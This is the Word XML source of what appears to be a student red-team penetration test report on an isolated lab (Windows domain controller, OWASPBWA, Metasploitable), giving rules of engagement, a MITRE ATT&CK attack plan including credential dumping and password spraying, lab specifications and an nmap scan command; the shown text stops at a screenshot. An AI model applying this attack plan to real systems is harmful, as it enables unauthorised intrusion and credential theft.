          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>The 2025 assaults on M&amp;S and Co-op demonstrate that major dangers frequently target people rather than just technology. Ransomware, password theft, and deceiving individuals into doing things they shouldn't have created several issues and data loss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE7168D" w14:textId="60A60650" w:rsidR="00115C04" w:rsidRDefault="00DC115F" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC115F">
        <w:t>We can learn from these attacks. We can make our security measures better by heeding those lessons. We need to not only authenticate people's identities, but also adopt technical safety solutions. This is crucial. M&amp;S, Co-op and others may be safe from these attacks if we follow the advice of the NCSC and the IISF, especially in terms of deploying security measures that are hard to bypass and being very wary of people who ask for help.</w:t>
      </w:r>
      <w:r w:rsidR="00115C04">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7026F7C4" w14:textId="77777777" w:rsidR="009B17B1" w:rsidRDefault="009B17B1" w:rsidP="009B17B1"/>
    <w:p w14:paraId="6EDB1EB7" w14:textId="77777777" w:rsidR="009B17B1" w:rsidRDefault="009B17B1" w:rsidP="009B17B1"/>
    <w:p w14:paraId="273A75EA" w14:textId="77777777" w:rsidR="009B17B1" w:rsidRDefault="009B17B1" w:rsidP="009B17B1"/>
    <w:p w14:paraId="543A07D0" w14:textId="77777777" w:rsidR="009B17B1" w:rsidRDefault="009B17B1" w:rsidP="009B17B1"/>
    <w:p w14:paraId="3347FFF7" w14:textId="77777777" w:rsidR="009B17B1" w:rsidRDefault="009B17B1" w:rsidP="009B17B1"/>
    <w:p w14:paraId="0B0F7E4C" w14:textId="77777777" w:rsidR="009B17B1" w:rsidRDefault="009B17B1" w:rsidP="009B17B1"/>
    <w:p w14:paraId="288419FE" w14:textId="77777777" w:rsidR="009B17B1" w:rsidRDefault="009B17B1" w:rsidP="009B17B1"/>
    <w:p w14:paraId="055F70E8" w14:textId="77777777" w:rsidR="009B17B1" w:rsidRDefault="009B17B1" w:rsidP="009B17B1"/>
    <w:p w14:paraId="2AB0ED15" w14:textId="77777777" w:rsidR="009B17B1" w:rsidRDefault="009B17B1" w:rsidP="009B17B1"/>
    <w:p w14:paraId="7649A507" w14:textId="64B647A3" w:rsidR="00A000BA" w:rsidRPr="009B17B1" w:rsidRDefault="00A000BA" w:rsidP="009B17B1">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B17B1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TASK 2 — Red Team Engagement: ABCD Ltd — Complete Penetration Testing Technical Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F49F05" w14:textId="77777777" w:rsidR="009B17B1" w:rsidRDefault="009B17B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="024CFAD4" w14:textId="1B092C49" w:rsidR="00A000BA" w:rsidRPr="009B17B1" w:rsidRDefault="00A000BA"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sidRPr="009B17B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFF71BD" w14:textId="02891B17" w:rsidR="00A000BA" w:rsidRDefault="00BE6727" w:rsidP="004F0197">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE6727">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>A detailed red team assessment of the virtualized network of ABCD Ltd. focusing on three assets is presented in this technical report. This assessment adopted a structured approach to red teaming in order to simulate an attack and perform a penetration test. The aim of the assessment was to show proof of concept end-to-end attack paths to access critical data, escalate privileges in an Active Directory domain and establish persistent command and control on multiple platforms. This review recommends improvements to network segmentation, detection and authentication to minimise risks.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B64A91B" w14:textId="41E8B75E"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1 Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361C8A18" w14:textId="2F4C7979" w:rsidR="0020761A" w:rsidRPr="003A1065" w:rsidRDefault="00FB180E" w:rsidP="003A1065">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB180E">
        <w:t xml:space="preserve">A full security assessment via red teaming is required in the ever-evolving cyber threat landscape. Red teaming against malicious threat actors and their tactics, methods, and procedures (TTPs) assesses an organization's capabilities to defend against real attacks [19]. To test detection, prevention, and response technologies, this attempt to breach ABCD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB180E">
        <w:t>Ltd's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB180E">
        <w:t xml:space="preserve"> network leverages targeted attacks on the vulnerabilities of Windows Server 2019, OWASP Broken Web Applications (OWASPBWA), and Metasploitable virtual machines. The virtualized environment offers containment of activities and opportunity to implement attack chains, delivering observable metrics on the effectiveness of security controls and preparedness of an organisation against advanced malicious techniques.</w:t>
      </w:r>
      <w:r w:rsidR="0020761A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B98F989" w14:textId="040AE669"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2 Rules of Engagement (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>RoE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E709820" w14:textId="77777777" w:rsidR="00FB180E" w:rsidRDefault="00FB180E" w:rsidP="00FB180E">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>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The scope of engagement includes three virtualized machines in a remote network environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3018E846" w14:textId="5A92025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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: Windows Server 2019 (192.168.227.13</w:t>
      </w:r>
      <w:r w:rsidR="007864B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>) — Active Directory Domain Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46939D19" w14:textId="7777777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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: OWASPBWA (192.168.227.128) — Vulnerable web application server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FE8F7E" w14:textId="7777777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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: Metasploitable (192.168.227.129) — Legacy Linux service host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365AF9B2" w14:textId="77777777" w:rsidR="00FB180E" w:rsidRPr="00FB180E" w:rsidRDefault="00FB180E" w:rsidP="00905635">
      <w:pPr>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Activities including reconnaissance, scanning, unauthenticated and authenticated exploitation, privilege escalation, lateral movement, exfiltration (simulation), and persistence are all allowed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57046C8F" w14:textId="5FC57D0B" w:rsidR="00FB180E" w:rsidRDefault="00FB180E" w:rsidP="00905635">
      <w:pPr>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 xml:space="preserve"> Denial-of-service, destructive payloads, physical damage and other network connections are not permitted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7F0408" w14:textId="556D23D4" w:rsidR="00F16CB9" w:rsidRPr="00F16CB9" w:rsidRDefault="00F16CB9" w:rsidP="00905635">
      <w:pPr>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Termination as soon as possible when communicated via special channels with the word REDSTOP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AE2DD5" w14:textId="1882869F" w:rsidR="00A000BA" w:rsidRDefault="00F16CB9" w:rsidP="00F16CB9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Any type of operation within secluded laboratory setting with clear permission. None of the interactions between production systems allowed. Ability to fully restore VM snapshots during engagement.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="396B4B65" w14:textId="3CEDC12B"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3 Threat Emulation Plan and MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6438427F" w14:textId="07BA0F62"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3.1 Threat Actor Profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5BF60D" w14:textId="3174EB5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virtual opponent is a financially-driven cyber-criminal group with an average level of technical advancement, where customer databases and authentication keys are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>monetised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> [20]. The threat model includes initial access via exploitation of web application, subsequent internal network reconnaissance, privilege escalation and credential harvesting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFB2A7D" w14:textId="67AC011D"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3.2 Attack Phases and MITRE ATT&amp;CK TTPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D99C81D"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1: Reconnaissance and Initial Access (OWASPBWA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9EDE0B"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T1595.002 (Vulnerability Scanning)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB94036"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T1190 (Exploit Public-Facing Application)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E126F8"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T1059.004 (Unix Shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA0B94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2: Privilege Escalation and Persistence (Metasploitable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F0DA0B"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T1210 (Exploitation of Remote Services)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E9BE80"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T1068 (Exploitation for Privilege Escalation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3DFA8F"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T1053.003 (Scheduled Task/Job: Cron)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC2136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3: Credential Access and Lateral Movement (Windows Server 2019)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596FD70C"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T1110.003 (Password Spraying)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3299C5C5"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T1021.002 (Remote Services: SMB/Windows Admin Shares)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5044EB4F"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T1003.001 (OS Credential Dumping: LSASS Memory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F04203E"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T1078.002 (Valid Accounts: Domain Accounts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F0A5CA" w14:textId="0A3AC90B" w:rsidR="00A000BA" w:rsidRDefault="00F16CB9" w:rsidP="004F0197">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Success Criteria: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Exfiltration of a database out of OWASPBWA, root-level persistence on Metasploitable, and acquisition of domain administrator credentials out of Windows Server 2019.</w:t>
      </w:r>
      <w:r w:rsidR="00A000BA" w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C9DFEB" w14:textId="54AF2227"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4 Laboratory Environment Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A01663" w14:textId="26D15646"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4.1 Network Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F87898A" w14:textId="643E3516"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laboratory setup includes four </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>virtualised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> machines, which are connected to an isolated subnet (192.168.227.0/24), which does not allow unintentional external network communication, but allows realistic internal propagation of attacks [21].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB4481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Network Diagram</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCF278F" w14:textId="429368F4" w:rsidR="007864B5" w:rsidRDefault="007864B5" w:rsidP="007864B5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58C58059" wp14:editId="576C8FB4">
            <wp:extent cx="4743450" cy="2530875"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="10497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1705" cy="2535280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F8685A" w14:textId="3E31F9CD"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4.2 Virtual Machine Specifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C83160"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VM-1 (Windows Server 2019 — AD Domain Controller)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331B2F08" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="007864B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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Hostname: DC01.abcd.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E802D3"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Role: Active Directory Domain Services, DNS, File Sharing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C125FA"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Weak password policies, SMB signing disabled, outdated patch level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DAD30A"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LDAP (389), SMB (445), RDP (3389), Kerberos (88)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDF2410"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VM-2 (OWASPBWA — Web Application Server)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77775632" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="007864B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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Operating System: Ubuntu Linux 12.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3832BAF2" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="007864B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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Apache, MySQL, Multiple vulnerable web applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3A9648" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="007864B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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SQL injection, command injection, authentication bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA3FCC2" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="007864B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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Applications: DVWA, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Mutillidae</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WebGoat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7D246595"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VM-3 (Metasploitable — Legacy Service Host)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7859ED6D" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="007864B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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Operating System: Ubuntu Linux 8.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF668CF" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="007864B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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FTP (21), SSH (22), Telnet (23), PostgreSQL (5432), VNC (5900)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041F8A92" w14:textId="77777777" w:rsidR="00A000BA" w:rsidRPr="00A000BA" w:rsidRDefault="00A000BA" w:rsidP="007864B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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Unpatched services, default credentials, remote code execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E21666C" w14:textId="77777777" w:rsidR="007864B5" w:rsidRDefault="007864B5">
      <w:pPr>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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4913AD73" w14:textId="19438598"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5 Exploitation Campaign Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F1E747" w14:textId="780D2E14"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5.1 Exploit A: Web Application Compromise (OWASPBWA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654241BE" w14:textId="1D5A79F6"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5.1.1 Reconnaissance and Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E103A5" w14:textId="0F5F89E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The first network reconnaissance was initiated with the use of Nmap to scan ports and list services in detail on the OWASPBWA target (192.168.227.128) [22].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0855A0D2"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58073D87" w14:textId="40618E5D"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nmap</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sV</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sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A000BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p- --min-rate=1000 192.168.227.128 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547C591B" w14:textId="77777777" w:rsidR="00F16CB9"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This destructive scan list uncovered various HTTP services running on the ports 80 and 443 and showed a variety of vulnerable web applications such as the Damn Vulnerable Web Application (DVWA) and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Mutillidae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F16CB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD0B041" w14:textId="613BF6EA" w:rsidR="00981222" w:rsidRDefault="00981222"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981222">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D19157F" wp14:editId="46AE290F">
            <wp:extent cx="5943600" cy="3046095"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="284766683" name="Picture 1">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7208B504-2CD8-4BFB-88ED-D8A9D635CD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66683" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3046095"/>
